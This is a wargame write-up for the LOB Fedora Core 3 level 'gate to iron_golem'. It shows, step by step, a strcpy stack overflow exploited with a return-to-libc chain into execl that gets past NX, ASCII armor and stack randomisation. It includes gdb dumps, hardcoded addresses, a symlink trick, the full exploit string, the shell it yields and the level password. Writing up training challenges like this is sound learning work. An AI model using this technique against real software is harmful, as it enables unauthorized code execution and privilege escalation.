Wargame/LOB_FC

[LOB_FC3] gate -> iron_golem

bbolmin 2014. 7. 5. 14:04



#Env

- NX
- ascii armor
- random stack

#Technique

- Build the RTL (return-to-libc) arguments with a &ret sled





iron_golem.c source





1] Checking basic information

- Check the 'X' bit on the stack


[gate@Fedora_1stFloor ~]$ readelf -l iron_golem | grep STACK

  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4



- Check for ASCII armor


[gate@Fedora_1stFloor ~]$ ldd iron_golem

        libc.so.6 => /lib/tls/libc.so.6 (0x0071c000)

        /lib/ld-linux.so.2 (0x00703000)



=> The vulnerability is in strcpy; the stack has no execute permission, and ASCII armor is in place (libc is mapped below 0x01000000, so every libc address starts with a NUL byte).





2] Writing the payload




(gdb) r `perl -e 'print "a"x264'`

The program being debugged has been started already.

Start it from the beginning? (y or n) y

Starting program: /home/gate/iron_golem `perl -e 'print "a"x264'`

(no debugging symbols found)...(no debugging symbols found)...

Breakpoint 1, 0x08048426 in main ()

(gdb) x/10x $ebp-0x20

0xfefa29d8:     0x61616161      0x61616161      0x61616161      0x61616161

0xfefa29e8:     0x61616161      0x61616161      0x61616161      0x61616161

0xfefa29f8:     0xfefa2a00      0x00730e33

(gdb) x/4x $ebp

0xfefa29f8:     0xfefa2a00      0x00730e33      0x00000002      0xfefa2a84

(gdb)



=> |   264 buf   |   ebp   |   ret   |

The stack is randomized, but data that stays at a fixed position on the stack can be used as the argument values for execl (using a &ret sled).

(gdb) x/20x $ebp
0xfefe1128:     0xfefe1188      0x00730e33      0x00000002      0xfefe11b4
0xfefe1138:     0xfefe11c0      0x0070eab6      0x0083eff4      0x00000000
0xfefe1148:     0xfefe1140      0xfefe1188      0xfefe1130      0x00730df5
0xfefe1158:     0x00000000      0x00000000      0x00000000      0x00718fb4
0xfefe1168:     0x00000002      0x08048328      0x00000000      0x0070e9f0

(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gate/iron_golem abcd
(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x08048426 in main ()
(gdb) x/20x $ebp
0xfee0d3e8:     0xfee0d448      0x00730e33      0x00000002      0xfee0d474
0xfee0d3f8:     0xfee0d480      0x0070eab6      0x0083eff4      0x00000000
0xfee0d408:     0xfee0d400      0xfee0d448      0xfee0d3f0      0x00730df5
0xfee0d418:     0x00000000      0x00000000      0x00000000      0x00718fb4
0xfee0d428:     0x00000002      0x08048328      0x00000000      0x0070e9f0



(gdb) p execl
$1 = {<text variable, no debug info>} 0x7a5720 <execl>

(gdb) x/i main+113
0x8048441 <main+113>:   ret


=> 
&ret = 0x8048441 
&execl = 0x7a5720
execl(0x0070eab6, 0x0083eff4, 0x00000000)

payload : |   264 buf   |   ebp   |   &ret x 2 | &execl | dummy(4) | 0x0070eab6, 0x0083eff4, 0x00000000 ...... 

Since 0x0070eab6 becomes the file name that execl runs, it is enough to create a symbolic link with that name pointing to a program that spawns a shell.


ln -s a.out  "`perl -e' print "\x8b\x55\xf0\x83\xec\x14\x89\xc1\x31\xc0\x85\xd2\x74\x0b\x85\xc9\x74\x4c\x8b\x42\x04\x8b\x31\x01\xf0\x8b\xbb\xf8\xfc\xff\xff\x85\xff\x75\x05\x8b\x4d\xe4\x89\x01\x8d\x65\xf4\x5b\x5e\x5f\x5d\xc3\x8b\x4d\xe8\x8b\x40\x04\x0f\xb7\x04\x48\x8b\x8e\x88\x01"'`"




Exploit string : "`perl -e 'print "a"x264, "bbbb", "\x41\x84\x04\x08"x2, "\x20\x57\x7a\x00"'`"


[gate@Fedora_1stFloor ~]$ ./iron_golem  "`perl -e 'print "a"x264, "bbbb", "\x41\x84\x04\x08"x2, "\x20\x57\x7a\x00"'`"

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbAA Wz

sh-3.00$ id

uid=501(iron_golem) gid=501(iron_golem) groups=500(gate) context=user_u:system_r:unconfined_t

sh-3.00$ my-pass

euid = 501

blood on the fedora